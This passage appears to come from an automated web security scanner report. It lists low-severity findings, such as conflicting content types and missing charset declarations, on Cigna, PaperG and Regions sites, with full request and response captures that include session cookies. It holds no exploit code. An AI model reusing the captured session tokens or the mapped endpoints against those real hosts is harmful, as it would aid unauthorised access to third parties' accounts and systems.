Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6; JSESSIONID=0000m0b58O_Mt6JKcD_nHJ5-y0C:15eoj2vv7; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/xhtml+xml
date: Mon, 16 May 2011 15:31:37 GMT
last-modified: Mon, 20 Dec 2010 22:55:42 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
cache-control: public, max-age=432000, post-check=172000
Content-Length: 102026


var wptheme_DebugUtils = {
// summary: Collection of utilities for logging debug messages.
enabled: false,
log: function ( /*String*/className, /*String*/message ) {
...[SNIP]...
19.5. https://my.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /

Request

GET / HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 16 May 2011 15:30:31 GMT
last-modified: Sun, 15 May 2011 10:00:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.0.0.3 (Build 060807)
Content-Length: 297

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE></TITLE>
</HEAD>
<body onLoad="document.webseal.submit();">
       <f
...[SNIP]...
19.6. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/forgotid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:05 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.
19.7. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: http://www.mycigna.com/
Cache-Control: max-age=0
Origin: http://www.mycigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:21 GMT
Set-Cookie: TLTSID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:21 GMT
Set-Cookie: PD_STATEFUL_ccb88d86-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
19.8. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/includes/portal_styles.css

Request

GET /corp/sso/includes/portal_styles.css HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTHID=73F9C9687FD1107FC7C5A536181C0CE6; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:41 GMT
Content-length: 2621
Content-type: text/css
Set-Cookie: TLTHID=756B01F47FD1107FC7E5A536181C0CE6; Path=/; Domain=.cigna.com
Etag: "4ceaf758-1-0-a3d"
Last-modified: Wed, 21 Jan 2004 14:36:30 GMT
Accept-ranges: bytes

<style>
   
   body {
   background-color : #FFFFFF;
   }
   
   P, TD, UL {
   font-family: "Arial", "Helvetica", sans-serif;
   font-size: 9pt;
   color: #000000;
   font-style: normal;        
   }

   .body {

...[SNIP]...
19.9. https://sso.corp.cigna.com/corp/sso/professional/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Request

GET /corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:39 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Set-cookie: JSESSIONID=0001aplKypDyIh3-IsriGvhcHmv:13agknsul; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Password - Enter User Name</title>
<link rel="ST
...[SNIP]...
19.10. https://www.paperg.com/privacy.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /privacy.htm

Request

GET /privacy.htm HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.placelocal.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:21:42 GMT
Server: Apache
Last-Modified: Tue, 13 Apr 2010 15:59:16 GMT
ETag: "5a24-4842057efdd00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=15000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 23076

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns="http://www.w3.org/TR/REC-html40">

<head>
<
...[SNIP]...
19.11. https://wwwa.applyonlinenow.com/USCCapp/static/error.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wwwa.applyonlinenow.com
Path:   /USCCapp/static/error.html

Request

GET /USCCapp/static/error.html?error_code=1001 HTTP/1.1
Host: wwwa.applyonlinenow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000-WFxmOduXYdmC1gWAc0SlDo:-1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:28:16 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Last-Modified: Wed, 04 Nov 2009 19:27:38 GMT
Content-Length: 2018
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>We apologize for any inconvenience.</title
...[SNIP]...
20. Multiple content types specified  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_static/js/element/main.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /translate_static/js/element/main.js HTTP/1.1
Host: translate.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.xsnet.com/

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Thu, 20 Jan 2011 00:45:53 GMT
Date: Mon, 16 May 2011 15:43:04 GMT
Expires: Wed, 11 May 2011 20:56:54 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5091
Cache-Control: public, max-age=7200
Content-Length: 96489

(function(){function h(a){throw a;}var i=true,j=null,l=false,aa=navigator,ba=Error,ca=Boolean,m=undefined,da=encodeURIComponent,ea=parseInt,fa=parseFloat,n=String,p=window,ga=Number,r=Object,u=documen
...[SNIP]...
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF8"><link rel="stylesheet" type="text/css" href="',a.A,'">
...[SNIP]...
21. HTML does not specify charset  previous  next
There are 24 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

21.1. http://cigna.com/sites/toolkit/managers_disability/home.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/home.htm

Request

GET /sites/toolkit/managers_disability/home.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:29:54 GMT
Content-type: text/html
Cache-control: no-cache
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>CIGNA.com - Managers' STD Toolkit</title>
   <link rel="STYLESHEET" type="text/css" href="/sites/toolkit/manag
...[SNIP]...
21.2. http://cigna.com/sites/toolkit/managers_disability/return/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Request

GET /sites/toolkit/managers_disability/return/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:32 GMT
Content-type: text/html
Cache-control: no-cache
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>Managers' Disability Toolkit - Return-to-Work</title>
   <link rel="STYLESHEET" type="text/css" href="/sites/toolki
...[SNIP]...
21.3. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Request

GET /sites/toolkit/physicians_disability/home/forms/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:34:18 GMT
Content-type: text/html
Cache-control: no-cache
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>Physicians' Disability Toolkit - Forms</title>
   <link rel="STYLESHEET" type="text/css" href="../../includes/style
...[SNIP]...
21.4. http://cigna.com/sites/toolkit/physicians_disability/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/index.htm

Request

GET /sites/toolkit/physicians_disability/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:14 GMT
Content-type: text/html
Cache-control: no-cache
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <title>CIGNA.com - Physicians' Disability Toolkit</title>
   <link rel="STYLESHEET" type="text/css" href="includes/style.c
...[SNIP]...
21.5. https://cignaforhcp.cigna.com/wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp

Request

GET /wps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/ProviderTheme/themes/html/CignaProvider2/js.jsp HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/wps/portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6; JSESSIONID=0000m0b58O_Mt6JKcD_nHJ5-y0C:15eoj2vv7; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/xhtml+xml
date: Mon, 16 May 2011 15:31:37 GMT
last-modified: Mon, 20 Dec 2010 22:55:42 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
cache-control: public, max-age=432000, post-check=172000
Content-Length: 102026


var wptheme_DebugUtils = {
// summary: Collection of utilities for logging debug messages.
enabled: false,
log: function ( /*String*/className, /*String*/message ) {
...[SNIP]...
21.6. https://secureapps.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /

Request

GET / HTTP/1.1
Host: secureapps.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: secureapps.regions.com-ssl=R54983192; WT_FPC=id=2125ecebef9cc3240da1305556579133:lv=1305556579133:ss=1305556579133

Response

HTTP/1.1 403 Forbidden
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:41:40 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...
21.7. https://sso.corp.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /

Request

GET / HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=84D993307FD1107FC884A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:19 GMT
Content-length: 261
Content-type: text/html
Set-Cookie: TLTHID=8C93EE5E7FD1107FC96FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; Path=/; Domain=.cigna.com
Etag: "f2e32241-1-0-105"
Last-modified: Sun, 17 Jul 2005 20:01:07 GMT
Accept-ranges: bytes

<HTML>
<HEAD>
<META Http-Equiv="Cache-Control" Content="no-cache">
<META Http-Equiv="Pragma" Content="no-cache">
<META Http-Equiv="Expires" Content="0">
<META HTTP-EQUIV="Refresh" Content="0
...[SNIP]...
21.8. http://www.paperg.com/jsfb/embed.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Request

GET /jsfb/embed.php?view=all&pid=891&cid=0&bid=1552 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:47:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 49236


   var view_all_board = document.getElementById("view_all_board");
   if(view_all_board)
       view_all_board.style.height = "450px";
   var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_roo
...[SNIP]...
21.9. http://www.paperg.com/sitemap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /sitemap.php

Request

GET /sitemap.php HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
